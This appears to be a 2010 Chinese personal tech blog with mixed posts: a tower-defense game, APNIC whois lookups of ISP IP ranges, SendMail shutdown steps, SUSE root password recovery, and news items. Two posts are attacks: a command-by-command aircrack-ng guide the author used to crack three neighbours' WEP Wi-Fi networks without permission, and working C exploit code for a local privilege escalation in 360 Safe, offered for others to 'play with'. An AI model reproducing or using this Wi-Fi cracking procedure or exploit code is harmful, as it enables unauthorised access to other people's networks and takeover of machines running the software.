无言's Blog

守城游戏~

2010-06-13T15:44:06+08:00

一个魔兽守城的游戏，越到后边越BT，挺有意思，可以做减压之用.....

游戏地址：
http://www.ph-ok.com/attachments/month_1006/20100613154214.swf

对于这个游戏，其实玩了就知道了，最大化怪物要走的路线，最大化你炮台的数量，才有可能过更多的关数；

以下为我的部局设计，个人感觉应该是最大化了，仅供参考：

上图的怪物所走路线：149，炮台数量：98
下图的怪物所走路线：156，炮台数量：97

2010 世界杯（2010 South Africa 2010 FIFA......）

2010-06-11T21:21:21+08:00

如何快速获取电信、网通、铁通的IP地址段...

2010-05-26T12:03:48+08:00

IDC 这边网络终于通了(严重 BS 四川电信)，但由于所分配的是一组新地址，发现到网通的路由很多都不通（估计应该是路由表都还没加全呢~），M 总想知道有多少网通的，铁通的路由是不通的,帮他整理一份ip分配表..... 愁了~这要查各ISP的ip分配情况啊~

Googleing........~~偶然发现了个好办法准确的知道电信、网通、铁通等ISP运营商的IP地址段分配情况, APNIC（我就不用详细说了吧，它是管理亚太地区IP地址分配的机构）有着丰富准确的IP地址分配库，同时这些信息也是免费对外公开的...（嘿嘿，就喜欢不要钱的~~~）

找台linux系统，做以下步骤：
shell> wget http://ftp.apnic.net/apnic/dbase/tools/ripe-dbase-client-v3.tar.gz
shell> tar xzvf ripe-dbase-client-v3.tar.gz
shell> cd whois-3.1
shell> ./configure
shell> make
shell> make install

完成上述编译安装工作后，我们开始获取IP地址段；
中国电信：
shell> whois3 -h whois.apnic.net -l -i mb MAINT-CHINANET > chinanet.txt
中国网通：
shell> whois3 -h whois.apnic.net -l -i mb MAINT-CNCGROUP > cnc.txt
中国铁通：
shell> whois3 -h whois.apnic.net -l -i mb MAINT-CN-CRTC > crtc.txt

打开获取后的文件可以看到里面的信息非常详细，甚至可以看到各个分公司的负责人、电话、电子邮件等等信息。如果想得到一份整齐干净的IP地址段文件，只要用grep和awk简单过滤就可以了。

中国电信：
awk '/inetnum:/' chinanet > chinanet_ip.txt
中国网通：
awk '/inetnum:/' cnc > cnc_ip.txt
中国铁通：
awk '/inetnum:/' crtc > crtc_ip.txt

ok!! 打完收工~

附：chinanet_cnc_crtc_IP.20100526.rar

江老一路走好....

2010-04-06T16:38:56+08:00

王江民（1951.10-2010.4.4），北京江民科技有限公司（江民杀毒软件）创始人兼总裁。中国著名的反病毒专家、国家高级工程师、中国残联理事、山东省烟台市政协委员、山东省肢残人协会副理事长。2010年4月4日上午10点左右，在京西信翔鱼池钓鱼时，心脏病突发，抢救无效去世。

追忆94年，从kv100开始一直到300，实为江老的经典之作，想当年在DOS时期，一张磁盘走天下。管它是盗版还是正版，单从杀毒能力来说在当时是公认的...
群里有哥们发感慨：江老是被国内的杀毒界给气死的~~~ 唉！想想也是，看看目前杀毒界的混乱，也许江老这样走了也是一种解脱...... 江老一路走好.....

Google 走了..........

2010-03-23T16:00:30+08:00

突然发现,google.com、google.cn的访问都被重定向到 www.google.com.hk/webhp?hl=zh-CN&source=hp........
顿时那个咓凉~咓凉~的啊~~~

转一个西门的漫画...很有意思.....

BT3心得(BT3.....)

2010-03-10T23:40:54+08:00

郁闷~~~，目前住的地方没有小区宽带,要装电信网络还要装固话.......~~~

强烈BS一下电信这种捆绑销售~

无奈用WiFiHopper扫了一下周围的无线信号，6、7个AP。不过信号强度都很一般，很多还是WPA2的...
Windows 下的扫描工具推荐用WiFiHopper，基本上目前的无线网卡都支持，比NetworkStumbler 好用...
找了个U盘，做个BT3启动盘....本人用的是rockplay的霸天虎BT3.6.1(主要因为T61用的是4965,目前看，这个BT3版本支持的最好...)扫了一下，又多发现了几个AP,嘿嘿~~还有几个WEP的...看来蹭网有戏了........

加载命令：
modprobe -r iwl3945 (卸载默认挂载的3945驱动)
modprobe ipwraw (加载可监听的网卡驱动)
modinfo ipwraw (查看所加载驱动模块的版本信息)

加载接口:
airmon-ng start wlan0 (加载网卡，激活监听模式，扫描可被加载的mon接口)
airmon-ng start wlan0 11 (SK )
可通过ifcofig -a 查看一无线网卡的接口信息

全频搜索：
airodump-ng mon0 (基于mon0的全信道扫描，可以查到附近的AP信息,信号强度，加密方式....)

实例：
------------------------------------------------------------------
BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
C8:3A:35:0C:47:30   -1        0        1    0 133  -1   OPN
00:23:CD:70:FB:96  -81     1037        0    0   6  54 . WPA2 CCMP   PSK  TP-LINK_70FB94
00:27:19:97:76:B6  -83      792       27    0   6  54 . WPA2 CCMP   PSK  FAST_9776B6
C8:3A:35:0B:96:D0  -83      558        0    0   6  54   WPA  TKIP   PSK  Tenda
94:0C:6D:21:39:BA  -85      560        0    0   6  54 . WPA2 CCMP   PSK  zhouzi
00:19:E0:B8:35:BA  -86      388        0    0   6  54 . WEP  WEP    SKA  nrs
00:19:E0:39:0B:72  -87      244      100    0   6  54 . WEP  WEP         TP-LINK
00:21:27:35:E4:CC  -87      140       59    0   6  54 . WEP  WEP         wangxq
------------------------------------------------------------------

基于信道6的 mon0 接口扫描:
airodump-ng -c 6 mon0 (只基于信道6的扫描,很多AP默认都是用的信道6..能找到不少..)

基于信道11的 mon0 接口扫描:
airodump-ng -c 11 mon0 (只基于信道11的扫描)

基于mon0 接口的信道6扫描,并且保存为phok-01.ivs
airodump-ng --ivs -w phok-01.ivs -c 6 mon0
开始抓包，并且保存成ivs文件，ivs是最后用于破解的文件，ivs状态在抓包过程中，可以通过data值项看到，一般用于WEP破解时最好在15000ivs以上~，试了很多次，这是必须的，否则无法破解.....
目前BT3在破解WPA加密方式的还不够强悍...所以能搜到WEP，优先进行...

口令破解：
aircrack-ng -n 64 -b phok-01.ivs (WEP的口令破解...)
参数说明：
[-n]：设置WEP KEY 长度（64/128/152/256/512）
aircrack-ng -x -f 2 phok-01.cap
[-x]：设置为暴力破解模式
[-f]：设置复杂程度，wep密码设置为1，wpa 密码设置为2
aircrack-ng -w password.txt phok-01.cap
[-w]：设置为字典破解模式，后面跟字典文件，再后面跟是我们即时保存的那个捕获到WPA 验证的抓包文件。

嘿嘿~~ 经过上述努力，破解了3个WEP的AP，抓包时间长达2个多小时，不过还是蹭上网了..回头抽时间再研究一下，通过冲突模式重新连接所产生的握手数据来增加data值.....
aireplay-ng -3 -b -h <合法客户端mac> mon0

搞的时候懒得截图了，这图是从网上搜的，它用的是GUI模式，其实用命令行方式是最方便的...

SendMail 服务应该如何停....

2010-02-26T15:36:21+08:00

SendMail. . linux/unix系统等自带的mail应用，在多数情况下并不需要启用，而因它产生的安全漏洞却不少....

前阵子给个客户做unix系统方面的安全加固，用户的极光漏扫检测出大量的SendMail安全问题，就问我要如何停止这些系统的SendMail...

UNIX 停止sendmail服务..
AIX:
1. stopsrc -s sendmail （如果没有该命令，ps后看snedmail进程ID，kill掉即可...）
2. ps -ef |grep sendmail (确认一下 sendmal 的进程是被干掉)
永久关闭Sendmail.
3. vi /etc/rc.tcpip
按下述要求用#注释掉..
# /qpi=30m
# start /usr/lib/sendmail
wq 保存退出即可..

HP-UX:
1. /sbin/init.d/sendmail stop
2./etc/rc.config.d/mailservs, 把＝1 改为＝0

FreeBSD:
1. killall sendmail
2. 在 /etc/rc.conf 中加入如以下内容
sendmail_enable="NONE"
sendmail_submit_enable="NO"
sendmail_outbound_enable="NO"
sendmail_msp_queue_enable="NO"

Linux 停止sendmail服务..
Red Hat/SentOS:
1. /sbin/service sendmail stop
2. /sbin/chkconfig sendmail off

SUSE LINUX:
1. /etc/init.d/sendmail stop
2. /sbin/chkconfig -s sendmail off

Suse Linux "root" password recover

2010-02-24T02:08:53+08:00

1. Restart the machine, in the event of grub boot interface, an option where you start Linux with init = / bin / bash, by giving the kernel to pass init = / bin / bash parameter allows OS before running the login program to run bash, command-line appears.

2. Wait a moment there (none) #: the command line.

3. Then type mount-n /-o remount, rw said it would re-mount the root file system for read-write, with the read-write access after the passwd command can change the password.

4. Then enter the passwd command to reset the passwords. Enter a password that you remember, but can not remember all right, now we know the solution.

5. After completion of editing remember to use mount-n /-o remount, ro root file system will be set to the original state.

CCTV? CCAV?

2010-02-16T00:26:35+08:00

360"本地提权"漏洞后门利用代码....

2010-02-02T10:34:29+08:00

圈子里天天都是血雨腥风....360和瑞星整天狗咬狗，这不，哪个点不清的，在瑞星官方上发了一个360的本地提权漏洞..！结果，可想而之，好多人提权了（说真的，360这么垃圾的玩意还真有SB网管装在服务器上啊？）尽管瑞星很快将公布的代码删掉了，但这代码已然是流了出来....对目前所有版本的360都有效... 有兴趣的拿去玩玩吧....

#include
typedef BOOL (WINAPI *INIT_REG_ENGINE)();
typedef LONG (WINAPI *BREG_Delete_KEY)(HKEY hKey, LPCSTR lpSubKey);
typedef LONG (WINAPI *BREG_OPEN_KEY)(HKEY hKey, LPCSTR lpSubKey, PHKEY phkResult);
typedef LONG (WINAPI *BREG_CLOSE_KEY)(HKEY hKey);
typedef LONG (WINAPI *REG_SET_VALUE_EX)(HKEY hKey, LPCSTR lpValueName, DWORD Reserved, DWORD dwType, const BYTE* lpData, DWORD cbData);
BREG_Delete_KEY BRegDeleteKey = NULL;
BREG_OPEN_KEY BRegOpenKey = NULL;
BREG_CLOSE_KEY BRegCloseKey = NULL;
REG_SET_VALUE_EX BRegSetValueEx = NULL;
#define AppPath                        "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe"
#define TestDeleteKey             HKEY_LOCAL_MACHINE
#define TestDeleteRegPath    "Software\\360Safe\\Update"
#define TestSetKey                   HKEY_LOCAL_MACHINE
#define TestSetPath                  "Software\\360Safe"
BOOL InitBRegDll()
{
         LONG lResult;
         HKEY hKey;
         CHAR cPath[MAX_PATH + 32] = { 0 };
         DWORD dwPathLen = MAX_PATH;
         lResult = RegOpenKeyA(HKEY_LOCAL_MACHINE, AppPath, &hKey);
         if (FAILED(lResult))
                  return FALSE;
         DWORD dwType = REG_SZ;
         lResult = RegQueryValueExA(hKey, "Path", NULL, &dwType, (LPBYTE)cPath, &dwPathLen);
         RegCloseKey(hKey);
         if (FAILED(lResult))
                  return FALSE;
         strcat(cPath, "\\deepscan\\BREGDLL.dll");
         HMODULE modBReg = LoadLibraryA(cPath);
         if (!modBReg)
                  return FALSE;
         INIT_REG_ENGINE InitRegEngine = (INIT_REG_ENGINE)GetProcAddress(modBReg, "InitRegEngine");
         BRegDeleteKey = (BREG_Delete_KEY)GetProcAddress(modBReg, "BRegDeleteKey");
         BRegOpenKey = (BREG_OPEN_KEY)GetProcAddress(modBReg, "BRegOpenKey");
         BRegCloseKey = (BREG_CLOSE_KEY)GetProcAddress(modBReg, "BRegCloseKey");
         BRegSetValueEx = (REG_SET_VALUE_EX)GetProcAddress(modBReg, "BRegSetValueEx");
         if (!InitRegEngine || !BRegDeleteKey || !BRegOpenKey || !BRegCloseKey || !BRegSetValueEx) {
                  FreeLibrary(modBReg);
                  return FALSE;
         }
         if (!InitRegEngine()) {
                  FreeLibrary(modBReg);
                  return FALSE;
         }
         return TRUE;
}
LONG TestSetRegKey()
{
         HKEY hKey;
         LONG lResult;
         lResult = BRegOpenKey(TestSetKey, TestSetPath, &hKey);
         if (FAILED(lResult))
                  return lResult;
         DWORD dwType = REG_SZ;
         static char szData[] = "TEST VALUE";
         lResult = BRegSetValueEx(hKey, TestSetPath, NULL, dwType, (const BYTE *)&szData, (DWORD)sizeof(szData));
         BRegCloseKey(hKey);
         return lResult;
}
int main(int argc, char *argv[])
{
         if (!InitBRegDll()) {
                  MessageBoxA(NULL, "初始化BReg失败!", "失败", MB_ICONSTOP);
                  return 1;
         }
         if (FAILED(BRegDeleteKey(TestDeleteKey, TestDeleteRegPath))) {
                  MessageBoxA(NULL, "键值删除失败!", "失败", MB_ICONSTOP);
                  return 2;
         }
         if (FAILED(TestSetRegKey())) {
                  MessageBoxA(NULL, "设置键值失败!", "失败", MB_ICONSTOP);
                  return 3;
         }
         MessageBoxA(NULL, "突破系统安全检查，获得最高权限，漏洞利用成功!", "成功", MB_OK);
         return 0;
}